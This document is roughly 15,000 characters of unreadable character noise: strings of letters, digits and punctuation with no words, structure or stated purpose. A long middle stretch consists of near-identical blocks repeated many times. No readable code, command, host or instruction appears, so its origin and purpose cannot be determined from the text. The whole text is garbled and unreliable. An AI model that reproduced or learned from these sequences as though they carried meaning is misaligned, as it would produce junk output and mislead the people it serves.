5.[D5Zsl"2gBS2V9HywU}0,A`j%SKC1a]kD292eFj3^ACs0aI I!}^m\\#j262^+gM2jw.s928Bj`,B?NVu^8st:ut.4Fwt]4rq3#A]3"xJF5*?A9C}^Vcj"4C62T.\MsV?Z.q9 a/rw}XN2.oi`}1"ht_If99j.zh}2dcj3t&i3l!?q6]]`11jVly[Cx6m!qA5ZIyU ^omZ12+Npz[Zt9:3I72aGP.I&".Vhj j&j!8%jq.u[ysAtqzyCKg-"j3HswA`2xhj0p*4ywFPwIZ"isyHK9fj(4v:jo2HT4\}!"U.AFHt8t&jiwAijahj(s~pZ629!8t+`}(S2.f} }sqosHl(9/t3xA::}DPfgVC(9$IVt%}N.Zijky[!w313(ZNAcDUKwopZs]p8.}6:2FUi.~l.wH}1c:j#xnUgAtM5zpoV]}ZIcnog2iC9/tjHtN`6;1.galZ*UI`IzjV,f5 ,;lK^U^V4x5K$A6!^2 :\$p:}f}:sw\#4xPF\e9 H2p:A;j:&THV.AHAV]}Z*V` Vn.:\]iC"&5.4l8q4Kt2wqpNI2];,2\V8A].woI!o7K`sc9!S-.V}jH:.]]`s3\VsA+:OTn2x9jj3*8s4sCK~UrV3A[yNf}+43jF4#Uj3Wlb,.:3\(p`s 01  Gttmp.;pF~382lI:y4/ U4.}jXO.yN]#2t/8sA66fI*"!o}j^VcUMO!4VIU4 tC6`sI"ssG}!ZT]jA!:jsc}pa\H!jHpst%}s,ItTx}\2\2U?OK1^sI5"*}ZF4rV1r}s.x: sh+jw3J!\(`(BZ8"wMH!w/jqw##y,.]hI\tsj]:.]xK0NI5!w\.Nssj0w!}`q*( 9ljj9Uj!gvUV]^#jfCVjJp tan tH\sg;}xjd!tq+AYy5^$Ns}6K05zeNskgoA4pxa982^/mfBI[!5h^s4$H`*e#`}r#sxI}.A.9 \S|Zt\dFa+4w}5jqo-}s}Ajs.~} a$\3wM:2(F]oj(tytA?`Y.]NsLi 566sz*jVH_IA9.}swsKsN$Iq}j^2sy"hN`p!g(#!O5ty43ijDF]K~]lZ3.nb%689jk[x9]U.LW401f"K4j}HYfN8.4]q6CjVF!p!^d\K^f\x$A8oT!#X41Zsh^ZI.HiwE8.^(53s pj3*jkDj?A6!+Apa}0VV5jY :X/H.wL"&#W^TwIH T*IVV##0jXj38ZC.jeIyHUj^I;`Fa!SZs%?GtHi21.U!F~p.\d6jwxg!#Aj S6Hj^.IsIsCb,Mth^p]j&am3[bIV9fj24eIjw%?sI]Cb,3` 
WWS&4#jjD/U:Xy  a&Pj96N0}o\8sy]h4D[F^3:y$WN ty5.a$I0*HpU%" Gp\}i,tj:\jns4xjj]!iTg jj^}mZ6u\_IS#oz\[Mg/jC]Up^I 9CgaI0}6.wjf _NfUf3XKj9-jS&mFo(]VRyij\K1`sJ#`sFn3"D]2X/1f$~Njbh".js}y}/}0s%iq}ftT%X.!wPCsxW5Ktr}iO/}F~iSZ}ensw1tq"vt2"\d ]j.`12: 4/}NNojqIhi^Nt\qwtpK\B}38I2[x P4C629 NZp-}:V!tV\ tM\j\x["5.IS(!^3 t(r`./}2VV"pWX4s"3}VjC\2}his9WCMX9}.V+6q}&t3ID\f\%"3oG?N2\"D4S2tp1w1JP0N}Uotk+(ai8 XI5:1sji\K}&"3qoTFHYt[3t6#.j3Uf)X}Z.5gLj$;YTpqtjFZtxUPp2?x~#]jRhj.3cjojV^Vwa1w1(j^s\]TjZ[w-5jqjr:}5Ujw.?jsUI0VCHwswj#t0pjXjK^IUM1x[q4|}"U5 N$^V5*6 4V8 1A5j4}}8.*:j9K?qI3jq,oHAs:`#N}Nsw(8XO:dX0 ] D9e.Azjj1i\NIn}qjZtswpgs$hjjV95F^/}`suI A5Hw9t"isG..\$iw2msos}iw.n.w4SZ2fCZ}; #4&#4B9 ]U.qYA:!j"?j19KV9]#0Fx\q}qp:8itj^c5.]y]+^1}:OjAY\]j.Aj#`Dj&4u1!tKpj92gs4r}A}6_}$iZ1Emq.qr2^e\:"2m&4t}TgD#.w!l^I!C0Iseiw(]Cg9IjqtKotf"(^f}yN(} VBty69`+Ft+jOG}."kj.[?tU4jJ&4ej:I.C2IItT9x]Kw95L[~l:ssmLw]}At-AVK}q1AIT9~1Lx2P2DWqs#(j 9:jL~\lAs*].sZ^paV]Vgdm t"Iy%*`L\HrGq*K 9!6j99:s1xI3O982gZ"jo?}+438f1*j.Nu6j9;P3gse:lU\&B"IA93:M9]m_oTjwV#:9` Vy53x(8sj9gs4xPh9nF!\31V*2P N!t!a2\!AX"2OyS8oF5.xXIs}9}y.F}s6Y`i1A|!wHiM1XUy[*PixS#:a}?sVPi^wx 3"A[Lx}}so5loAr2w$NowGpjs/}oV&"+tKSy\B]Fj|"&[Fj%4Hjj".p`I}P2sw6o~/j3l#U20W:A3(K9A?09.IoA3 jN}jpN&1jx PCgHmK4xCuaI}3^9NZ1\6jVWP3g9j2X9gs)SSysf`Mg}pqm-IVVi#:AK`isn?:wo :lx:(s;t"\hiFx#I01JPoNxjVgLt!"}UFsk1A93jjj!I_5*.qt#[ZscmoN2p!K-}.j/(L*##9cejO*.0,*]0Yq]ugMCK9*`:}7Iq}fUj^p?_AuHZ.T\`}Z\fAo?:42}DAqHX]T9W}:X9jo1Ujw}6\iDA}4(9.42I_VZ\jl j`N5}yYfiqVMs}M2lV}:a\d!as]s4tM^HoHa].1x}#aj Lg*`:VX?qIK`V1+?sNUlA2*nAV;`VHW?3xUF!5 "K4XH O9ijjep.IB^ZIZ}#9Z#jXh`FHw}y6." 
^olqpAs}9ij.sj%IU}!X*]2ws5L\h] 4Hj(&.?qNBCoNH[3a9i3w\`3[~pj}\U9$j0wU5yNo}qmy" t!Ij8$#.jn\ O|} lD#.xVp03atwN9i/Oj8.wq"ZO~INAv`4-}Z%TH^tGnA}c`is2H:O#iV\j9L].i!^xt4$0YOjy1;]TwW}.w5(!48.`Yw9!"tlj5"rVm-[b,2iNw13go}V\/Iy[q V^tj."94 I3Cq}l89T\^FjGm(sdj2VAjCg!?89$jVtoPA1*\q1KHCjUPC4IjZ1l#!jC}&gHI_Idi:t}eiOwijx]t s+H0,f(3a6p0*hm0.Ueb,Zj#."5""\jj2U.#&jP&&P.xp1`F3]2}Ct+9v[:8t`!o;p..9`VwJrG}PKAI#\wNt9o.4lV9uHyjx:sBI}iws\s"54.A*]8s3]Vx2\&TfM(ZHANs5 D(I`V6KjIUjZsWm#sox^3nxctCB1C+^1].TaNZI3iq,S\ix\62x"5j#x4A6x9 DP109f0N-iV6sj!,UlFwJ\s\35:ah#P~A]Vg]NA9Tj2VsPTjM}."PU3ohlNNr`j\aI_N/4ZY*[21A5%N4IsaHj3jMmLth}#aItf"9H N][UYnC3j&C:9u`[ }VtA"2^h.j9/NwIj}`*2` tmpj^T}.9fjjoAnugV}jx9l^AB `II}fA 6swt:sHalA.2`f"dK`YfjZV$iZs`iYA}Vwf}V`6q.$rj#9Zj.xG?0IBCVts\ jH}(\9dFHn^1smL"i.o./IqY38ZHFjU18.w3ijl9Us[W6#x98!^dj.9jtyVZe#x.]ja3j!OG4`s11VzXlVI}?0Neis6s}!,74C\-njgWI qxjs^IjtaI 1]\omhiT^PjgBjKoA1os(53`f5jsF.wjfHZYZ(3.Vpj8p}!x6:32snU\2tMZA1ssJnVFZ#V^M 3\j5.B.4AI3\FjA.sF-p^ja]`sS: N;mjlHi!Rc:L$Mt%4t2KT1GA(Ps9Z[ix5}.4-1yoGH0s 13XOlZI;j2t*iqYj:V1^.w2eF^p\VV \ht662wuSZ*t}`63P3a\[j"e2oU4yFHgDo?jw442AU}sH!:3s8.!Aa M5 5 1!^3ane(wfp0,je0Y2i#jI^swGmM]b.8Vp9!lUS.9j5.V/6`sW3V2r.93eL^Z}sV&tf9A}j^/1`9#8`I*th4Z}j^AI!B ?w1*3X4p`VU5Z9.ebY&9%.Vp.z*Hy0y:Mo(\jOC}Vw]IZs!HZwWisa?64o\ 4Z`*}"Vj$l^.e1w.]]`sW"PAVKK^JH?R&t2(*JT4A[ ^6js9f}sN5Pqw:t!wG`Ks\rq,}jtA}w1eN8V6[s6qhN^p xHC!8HmjqpHq"}^CTApZ1$}ZYZ} g*i:I.2H~pos*gCx]H_.aK_Vf]wH!5p9"lj\]F!wV5VH9[3wrjjjopU,. ;Yn\oj9]24\5.Ll?j.M`VIap^IBIV9$}`96th,GmKxA#jgpm&[2i!DA ZD-j2N3]`IA}pa\3^]\3B"..s\"wU s$.`.ji8}AIi.j:D/nj8r"#1^+9FCVw(jZ.}}jA.CT4|}:1.tVBsrjs6m2"UI_t(r`.H]jAs\U.VIjDoiM4}q[K[T\\}1*ps*e8qh&nVwD] 9ts4}AV?m!g9IZF5KZNP\0sWm Yxp.0a]L"C(!owCo4A]sjf.`sGJ8}(P#wr V9f5.[Z5026(fwrV*/50woeZ}Z`i}2+4J}K9w\FH3tiA!e.~3.0tCC8sW#TwxCK4tq:^W.NIyjswJIq,!IywjCV%F5Vs"4y4r8F&h:!XjtU4I#w.p.A388AD]u9LCX%\M]^pqV9g a$}8sfmyVH]V*r1+,I}:^B}.^p}Ms2Piww\2OJ|Zs!}0t\jTjZJy"+9 Bw?09S5DiI8b*. 
wF]qN:\+,wp?O$]ZDf((#Z#Vw5n:8*N0.4notf}rDZjjao5j[_m^2y5jAf+`6/l0FB}H,A\T9slCKT]s4Cmk1/tV\A} jfp0.9HAwc}%~DClHU o$+V}dF^up`wBr_1BCj.5ju}:.!\] Vj1\:[tF+1 jO]lH,9]:VA6 DZ}3D!53sW+o1x5.9!? s/m`s/j;,M\iI_If~!j9/gfL!jVx9i38JpZ.5]`,SjigDiFw.IF#wHw1j"jwhp`s$IsYHCAt&13wxjx9F#(^A5:\\no4A}.`-H VG[81\}hwxjx\/\x[:HN19`&^3S2.-?GtB\A}L` oW?3""P(w&5VofjswIt!0aKNs5t0st}V8jC(99:CHUp`1pjj9pZV$5y*BH2N}UU1N?2w9P Ofq:[r8Tgy]:9BIj99i`FtC3xw} 8F(2tSIAV?U!X*GA(K0Ife`pD`93S}K4#jy9?tk1ICVxr](\+SyIj#N9fH+X}t!Sa\K4xNAIZ(s~dp`N5m..j}q1A5"V"Ij\V8FwrsVh]ow?\f"a}y,/jqFCeqaW8M"3U.Hg?Z,Z\^!jVN#.VIu]Z6A`jYt.swG#&4W:2owCqws#Ma4jqYBeqNs}Vjv[!^3:!e2p^3ymVT*GIFp0Netw9&mT.;4(wBPK"sIj4IP xCH(gBp`su]NAA]"^h}j46tMHD1qwAU2&qp`}AH8p"}s6s"".tVg]n2aMIF[ZCTa5nM4FjyIunw1}iixF 31X92oVr:9L9!\q5ZtFmV9;isF.5iN"HjxC\V\Fq3#W\sxI]:DC.ZwUe8.*}VOsPj8t"y4g. ALt!l5p`N!NjwU}s}}thtHpj46\Mw&5x]l#"wv}8 HAs$}y%\Ho^LPj^#\y4+.qw.2jPK`sop`.$}`9s"3s~Ijj$}jwZ53oAn3x&}.x9p`F$eZsx}pg|#K~G:jHV}A9."8#pqt IZqT}sF/:qw_x~i]!x/"MqMPsa(]:9]NZ}#}q*r6#wCHKjj"jsXp`Vs:.w-.^mq+VIp6As3"q}`5!9!CVa5`2OtP#`!iKx2K`s!}oNA}Vx&8MjPjK#Vj0.M`.^9lZ,jI8}Xes*mqV&Kjg] 2lXqV[|e+gCC95j:N]}^1.]ilK#3jBtM4V?^}/tMwp? 
wHI^./ ^tnqw_4C44]&4WqV^h}i9I#:aup tU `tw}+X2ej9 m:3XKNsA(Kw6jt/N8wC\VtA5Ts~+3g#}.\:3t.Cqj&#MX4KqYf]^HF]+w5^M^3ty#Z5jNAmjg.NAs6msNJC8m\d"VtjV\FPFx5U3q.#iWDP&^uHZjz]sYv]q9qiFwT53o54.}IUK^pjtBKqsp]sVk"3.A2l3\M4D5V[c\ x(PLwGI8}f VVWCoa:[!\C"Ft7jjt1"V^ujN.hHN.- `oh:!YG}.g/ij";sorChgq}ja*Nw.]e.Ac#sa(}:9%9FoV.q!6gxOHqN*pjN}]0smosjI.xo}j8p`3[?8owA#Lx!mVIo  }L838Ae.1q(:B_.^A}(Oj^N6HG1#]^1lj"b8pVaP jal\s[Zto^s}:lF1q1f}ZNpHVTy]K&TdF#\j`tjqKAIsI]0s/eyN.5fV\"$j.wAIjo2ii\.e.96m^2z6:s9#"`hPj9!j32$}^t|}2xPlA*%+qV/io}Am#9g.w/n:"sjxsL8P^*}jj!m2N]^Vwk 3xhijO\ [Aps6|":"ppsw3I:V+j:9Zt9t~?D!C2j?`jOIiVjfj.a".Z.4i`*M]%~2}j43q3BjIot?":w6pyIdI^.O#scX`#s~.:8!^ "(j3tV]hjfP!x!.^}XejtZJqwCi\55slj_Ik"Ca/ps664w3A]N2X`ic8jF1q8&y9!Hqn!j?\("!}A.i^Aj*esa(]xjo"!odpoVsjy^"^Hap09oP }Kj".SmVxd^Mjy"afe#jZJy"T1A9$[VsniixI^&92"xH~}2wA5?Df?oq-42}ttZ.y`iY2.2"snjg1j([9}P4&H2S*p2}9j.VA}PgA] ^*n!oxH_.l9XDfp`hA}8Ite2N\5"9:m&w3\jwnjM1DC#^ct!w .wVuHG9si3wI}j9]`jo~IA.x"sj$4Zs/5Zq-PwN}(iV"}!"GP:"(j.ow\+1c#9%pq9\ NIr]i^c jOo"s)Ml^q6"3gOp^s9powAeZ9A:3s~1!j38:1Dg31Ze+Xs]swFHVV\\wt.P+^ft2wH5FBj. 
HF`j&+Kq,3r`pT\AIs:3s~j^UjM^sI 1(]Vwx#3\/.:t3FZ*!t 9 \jgAU3#AHApD"Va!?`V"p:9J[ZY&:3s~ljjti?RyqfB|]iw5n:9HljVotsNlPo9V]jx\`s8jq/6`jx].:qA}2sPAs&Upt~p!4e\LI*\:1}8qxs62x 1GNuH`6AeV"h]jx;`!4yI`I6t34A4^w$|Z}J}2IqUI"plt^fjw"C[5\3aC}g.pZs}6wAtiiw/6s"j"V2Nm8s?tsjtpqN/j0FUt`1A" tj.3\$}jXv"(#1}P~Si!1*jqH"i:}KPVgxP.~]jy}M5sFf9!9XIN}$IAF2 0IsIi9xj^sj2wKt.#V 3x/j."-}H,G\Zs/Cs^(i:4U5jA.}2I3t 5"KwNtpqq"j IHqo}l539#8 xY`21CCTwCt3j*4V9G}s*3]+43}j4#:3H H`If9f~]G9F4wW-jq3!Uf1Kpj9 H2wA5x]L\qa;jj4FHwsG#`1D]o&y6.gCsGSKywcj3j$5UYB}2NPe 1r`i.~.jxF]fjyU[1}Uth 3I*N2t9#NIZP gj}j969:BD Al9!w$`N*}`N%}jILt%VD}24%}.^5U:a5]Tly .4HjqHz# wq]3g5ixgt"xH&52w.tFw3l.sHI`.6i^1Ig#s+Hf~B]2^f`V}6}T^Dj3w]IGAFj8I9\qgjPK"Hjso;j8..ts"i+G9pN`s]}stkU3*k5 lC8Mgy5.21#9g&}L~!pZ,3C2N1tTxfP3tA9!1jK09H`jAAqFBH06#j:1n5i9wKsjoHsx;jK#1}iZyPFjo1w93#:3hjqaq}g.`j2I}sV|q3wO.NtJ4AFFe.13t 12NFa#n:91q.sPTxKCCws.ZsenAY\ x?P:^}"CLHI`F}:.^Cpq6T}`6!\_1|\#.Apj9B}(\`3qxPVDMi9omAwd\_Ap]T\2 ?Dt5!O"?NAxDujwN6Nww9 oAAjTVsp"j#Mg(5.H/C+x(#(9BN8wXj^N/6oaCi:XC9(s"IoNxjsx+52tiNy6] `sx"#w&pL\hnL4/:Ms1i!gK}x4$?.A]n0I9#ut! 
s""jj42p`w!q3\f5N1s}_N]}s,lq ,.Ij&*]f4p}Mqf6!gVtf~$.0hzP`oy^P`6}jgJq2BSlysM9!w]IZ9*}2N]]^N9`/Ysm 93[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJXR*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I-SZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSH,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H%-6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+JH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH%\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\J"4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[rR\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\J&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJXR*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I-d!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfdX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX07rA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1ySH,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H%\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\dy4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9kR-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.SH%*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25-SZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSH,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H%-6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+JH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O 
J&1-9X071H,A`ZO+S2m-NH%-HH%\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\d"t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9r%7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7S&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MSXR*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I-J!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXR\}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO dX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJXR*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I-SZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSH,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H%-6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+JH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH%\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\J"4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[rR\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\J&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJXR*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I-d!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfdX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX07rA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1ySH,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O 
J&1-9X071H%\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\dy4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9kR-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.SH%*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25-SZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSH,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H%-6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+JH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH%\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\d"t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9r%7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7S&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MSXR*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I-J!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXR\}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO dX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J 93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93J a&5#Z]i"A[!w(ps,o]`1Atig2HC^9m.oojA.Am!"GmAY3}2NJ]sNIIiI~1fx!C2wx:.oC}iwSj!xtKZNG8812[TwA]M9*".]GNyF|5jwp?Z9-jZV.[8.K\T9MK3wf^ ^Z`3Ok}iAhP3jU4Z.Gj:}|tTw(]2"f(!4S?`,C\!wJpyN-4j9!iosj5islK:4Bt(4ZqqptTxV#2AqK`YGt8s9tTw(j2wf`jH 4.tS\!wKIsw$l`I/82sq\T}_}!xfPj^2gM^\iigA}j83ps,4]yN}eijA[Fw35V#"NyN&j!"Gpos3pqNu]qtI\i} pK~9C2wSU3e!^igA}.\UINIu]AI}PTDAHM99\!sdI09&Ij\$1wsupqNaP0sxIi};NFw$}(&D"V$x\VlsHsx/psoTP092iP"y]4$51hpy6cj O2lG9BI`s9CAH!tVwG1(g([y4LIjtA}Tx2tC\\SZs$HqYl#qwr} D69:B!js6k(VwT.AN NjW"is,nmisk}sAAj!"I(!oA}iwA fxF4wWz8_.3]+4* 
V9!mF2I}ZsA"yw}VF6+qI9HqYk"fN~pjjdnVIX}KHrCsxIe ZXl^weP wA}ixX V4F9.2oN2w1\!w$p`s$4AFpio.|j3}MKM^#[!lC`:t|#3\D\!8/l`sU}`sA}iwA}jw$5.sgIsVA9Ca$qN\42Nuj`1A5is~pjw$}jwA5x]&#T^fH38/l`s+]As}tT^A}jw$5jo~p`sAUf9/qN\N2Nuj`HD:i9ap9$}jwA5joA}iwACg!l`s+C0s}tT^A[F9B5!o~p`sA5jw$p`s9} Npj`1A:i}ap95}V^xUjoA}iwA}jw$p`s\JZ9}tT^9[F9B5!#gIsVA\!w$p`s$p`s$}`2!IT}ap43}V^xU.s&#T^f}jw$p`s$}`sA}iw2[ 8B5![gIsVAmj"/qNBp`s$}`sA5is~pjg5}F^xU[&#T^fj!8!l`sU}`sA}iwA}jw$5.3W?sVAma/qNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s3n09}tTap[F9B5!o~p`sAUM\/qNBp`s$}`ss9Ts~}!w$}jwA5Ft&#T^f}jw$p`sJ[09}tT^A}jw$5(s.IsVA\!w$p`s3NoNpj`1A5is~pjA-}F^xUjoA}iwAP:gFl`sU}`sA}ixr[ 8B5!o~p`sA5jw$p`s$p`s$}`sA5is~pjw$}.&XjL$j#"^Dts9*4w1u] .l]f4/i.w$5jow}V63"3xX5N96p^wui Vlq3*+pjjT]VjDgjtj]38*PMDjKjI$} .3]qxye3tqm B_NZsA5jxG}AmXmAs!twI1(9t+K0qC xC9!o.\!41#L~!jj1PHqYk]f9A}jw/jM]&?^I3U2a/p`}V?^I.8A,?jss839*^!wA5joK#"`h V4FNjwei0IL8i\;eKw BwI`s.(2x3.q6]HA6Oi 1k5is~pj\ \w(`3]L8#\Wt29 .wwe]Nsl#"`he.9!1!o_4_I}j "d5`N*NZ6Oi 1k5is~pjj68Fa(:xB.\q\!#s9!Ny1u#sY?8 Xy Vw/jViS.^1?jKjpKVFjmy9$}`sA"i*lV9!\sa.jx#38 X*eL&qNwwpH:AI8p4  Kx"5.ojj^NIj3xFKowBNjwun_1A5is~.8 8VAXCtL\s\H V4.pqqznV61nV^F 39*1!o~p`sItL^F5sFdHVsp] 1tquAkpj938!wA5joA]h9M8x9Bp`sB^2NAJTwX[!^+nF2XHZq!5(^\+`}9NA/*tZpcqp}x.Lw!j:^D`K#Z8+9sP.4eHs3Xe`6vF+4L}jw$5.4k429&UDoKo9]j`/X}o9*ju}d5&^4Pfxt2B|i95cH34e+j2TiA9Zj"~H[!4U"!0W? 
